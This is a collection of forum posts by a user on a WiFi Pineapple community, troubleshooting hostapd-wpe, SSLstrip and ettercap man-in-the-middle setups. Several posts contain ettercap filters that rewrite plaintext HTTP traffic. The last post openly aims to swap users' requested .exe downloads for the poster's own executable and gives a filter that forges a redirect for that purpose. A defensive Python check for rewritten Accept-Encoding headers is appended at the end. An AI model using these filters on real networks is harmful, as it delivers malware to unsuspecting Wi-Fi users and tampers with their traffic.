Posts posted by DarkPringles

  1. Hey DataHead, first, thanks for your time. I installed the IPK file. Can you tell me what you have done for the compiling process? Have you patched the hostapd application?

    In the installation guide on the GitHub project, hostapd is version 2.2, but in the IPK file it is 2.3-devel.

    Output after running hostapd-wpe:

    hostapd-wpe hostapd-wpe.conf
    Configuration file: hostapd-wpe.conf
    Unsupported EAP type 'FAST' on line 78 in 'hostapd-wpe.eap_user'
    Line 42: unknown configuration item 'eap_fast_a_id'
    Line 43: unknown configuration item 'eap_fast_a_id_info'
    Line 44: unknown configuration item 'eap_fast_prov'
    Line 46: unknown configuration item 'pac_key_lifetime'
    Line 47: unknown configuration item 'pac_key_refresh_time'
    Line 48: unknown configuration item 'pac_opaque_encr_key'
    7 errors found in configuration file 'hostapd-wpe.conf'
    Failed to set up interface with hostapd-wpe.conf
    Failed to initialize interface

    Best regards,

    DarkPringles

  2. In my proxy, I make sure that the length is recalculated on injection.

    In regards to ettercap, I genuinely do not know, I haven't got too much experience, but I would expect it does. I'll take a look at the source this weekend.

    I am expecting to launch my proxy by the end of the month / start of next month.

    Best,

    Sebkinne

    any updates on this topic?

    btw: realtime file download replacement is now integrated in zANTI2 App for Android (replacement for dSploit)

    Link: https://www.zimperium.com/zanti-mobile-penetration-testing

  3. In my proxy, I make sure that the length is recalculated on injection.

    In regards to ettercap, I genuinely do not know, I haven't got too much experience, but I would expect it does. I'll take a look at the source this weekend.

    I am expecting to launch my proxy by the end of the month / start of next month.

    Best,

    Sebkinne

    very cool. i will be waiting and stop my work on ettercap custom filters.

  4. the message is: "Privileges dropped to UID 0 GID 0..." ... iptables are also enabled. i used the same configuration at my kali box with the same results...ettercap found the string but replacement is still without impact. i use non ssl sites to test it.

    so it has to be a trivial error, because it does not work on kali or the pineapple.

    to sum up.

    UID change to 0

    iptables uncomment in etter.conf

    the custom filter is like in the post before

    command in kali: "ettercap -Tq -i wlan0 -F custom-filter"

    command in pineapple: "ettercap -Tq -i br-lan -F custom-filter"

    any ideas?

    thanks for your time!

  5. Your ettercap config may need iptables enabled... idk maybe u have already done this

    Also u need to see plain text, accept-encoding replace with Azzept-encoding

    Idk maybe u left that part out of your post

    thanks for help. i forget to replace the encoding part .... -.-

    my filter is now at this state but no result at the client side =(

    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
            replace("Accept-Encoding", "Azzept-encoding");
            msg("Enc Skippd \n");
        }
    }
    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "software")) {
            replace("software", "hardware");
            msg("Software Replaced \n");
        }
    }

  6. @cheeto

    This is correct.

    Another problem: After shutting down SSLstrip all clients lose internet connection because the ip table rule for SSLstrip is not correctly deleted. I put the following content to the actions.php in the SSLstrip infusion:

    File: /pineapple/components/infusions/sslstrip/includes/actions.php

    after: "if (isset($_GET['stop']))"

    insert: "exec("iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000");"

    to ensure that this route is deleted correctly. now the clients get internet access. maybe the Hak5 Team can add this in the next version?

    Cheers,

    DarkPringles

    Unfortunately I can't, ettercap is a bit buggy.. Let's see whether we can maybe get hold of a newer version.

    Best Regards,

    Sebkinne

    Just found it out. Ettercap disables IP forwarding in the kernel before it starts sniffing. Just enabled it again ("echo 1 > /proc/sys/net/ipv4/ip_forward") after starting ettercap. After doing it clients get internet connection and you are able to manipulate the traffic with custom ettercap filters....

    But manipulating the traffic with ettercap and custom filters is still not possible for me. Ettercap told me that it found a string and replaced it but without impact in the client's web browser -.-

    source of filter:

    if (ip.proto == TCP) {
        if (search(DATA.data, "Software")) {
            replace("Software", "Hardware");
            msg("String Replaced \n");
        }
    }

  8. Hi Hak5 community,

    i have a few problems with implementing some feature to the Wifi Pineapple and hope anybody can help me. My goal is to run a script that replaces every requested *.exe file with a link of my own.

    Scenario: A user tries to download for example VLC Media Player from the official site (http://get.videolan.org/vlc/2.1.5/win32/vlc-2.1.5-win32.exe) over the Wifi Pineapple. The Pineapple intercepts this request and replaces it with a custom *.exe link so that the user downloads and executes my custom executable.

    In the best case i want to implement a tiny text file that saves the IP address of the user that got the replaced exe, and if he tries to redownload his file, he will not get spoofed.

    But first the replacement. I want to implement a custom ettercap filter that i found on the internet. But every time i want to use ettercap for unified sniffing, the internet connection of all clients connected to the pineapple aborts. The only way to get ettercap working is to set the "-u" parameter. This option prevents ettercap from disabling ip forwarding in the kernel. But with this parameter the usage of filters that replace data in realtime is prohibited.

    So the final question is how to run ettercap with custom filters or is there any alternative solution for my problem. i hope anyone can help me =)

    Best regards,

    DarkPringles, from Germany

    Source of the filter (i will customize that later) :

    # replace rmccurdy with your website
    # replace the url with what ever exe you like
    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
            replace("Accept-Encoding", "Accept-Rubbish!");
            # note: replacement string is same length as original string
            msg("zapped Accept-Encoding!\n");
        }
    }
    if (ip.proto == TCP && tcp.src == 80) {
        replace("keep-alive", "close" ");
        replace("Keep-Alive", "close" ");
    }
    if (ip.proto == TCP && search(DATA.data, ": application") ){
        # enable for logging log(DECODED.data, "/tmp/log.log");
        msg("found EXE\n");
        # "Win32" is the first part of the exe example:
        # if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
        if (search(DATA.data, "Win32")) {
            msg("doing nothing\n");
        }
        else {
            replace("200 OK", "301 Moved Permanently
    Location: <snip>
    ");
            msg("redirect success\n");
        }
    }
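
A defender-side check for the header rewrite that the filters in these posts rely on, as an added example that is not part of the original posts: it flags plain-HTTP requests in which `Accept-Encoding` is missing and a same-length look-alike header name (such as `Azzept-encoding` or `Accept-Rubbish!`) sits in its place. The sample requests, the allowlist and the function names are constructed for illustration.

```python
# Added example (not from the thread): spot an Accept-Encoding header name
# that was overwritten in transit with a same-length stand-in.
TARGET = "accept-encoding"
# Assumed allowlist: legitimate header names that also have 15 characters.
KNOWN_SAME_LENGTH = {"accept-language", "accept-datetime"}


def header_names(raw_request):
    """Header names, in order, from a raw HTTP/1.x request head."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    return [line.split(":", 1)[0].strip()
            for line in head.split("\r\n")[1:] if ":" in line]


def hamming(a, b):
    """Number of differing positions between two equal-length strings."""
    return sum(x != y for x, y in zip(a, b))


def mangled_accept_encoding(raw_request):
    """Return header names that look like an in-place overwrite of Accept-Encoding."""
    names = header_names(raw_request)
    lowered = [n.lower() for n in names]
    if TARGET in lowered:
        return []  # genuine header survived, nothing was overwritten
    hits = []
    for name, low in zip(names, lowered):
        # An in-place packet rewrite must keep the length, so only 15-char names qualify.
        if len(low) != len(TARGET) or low in KNOWN_SAME_LENGTH:
            continue
        if (low.startswith("accept-") or low.endswith("-encoding")
                or hamming(low, TARGET) <= 3):
            hits.append(name)
    return hits


def _req(*headers):
    """Build a constructed sample request (not captured traffic)."""
    return "GET /index.html HTTP/1.1\r\n" + "\r\n".join(headers) + "\r\n\r\n"


CLEAN = _req("Host: example.test", "Accept-Language: en-US", "Accept-Encoding: gzip, deflate")
AZZEPT = _req("Host: example.test", "Accept-Language: en-US", "Azzept-encoding: gzip, deflate")
RUBBISH = _req("Host: example.test", "Accept-Rubbish!: gzip, deflate")
UNRELATED = _req("Host: example.test", "X-Custom-Header: 1")

if __name__ == "__main__":
    for label, req in [("clean", CLEAN), ("azzept", AZZEPT),
                       ("rubbish", RUBBISH), ("unrelated", UNRELATED)]:
        print(label, mangled_accept_encoding(req))
```

A hit on a server or proxy log is a signal that something between client and server is rewriting plaintext HTTP; serving downloads over HTTPS removes the opportunity for this kind of in-path edit.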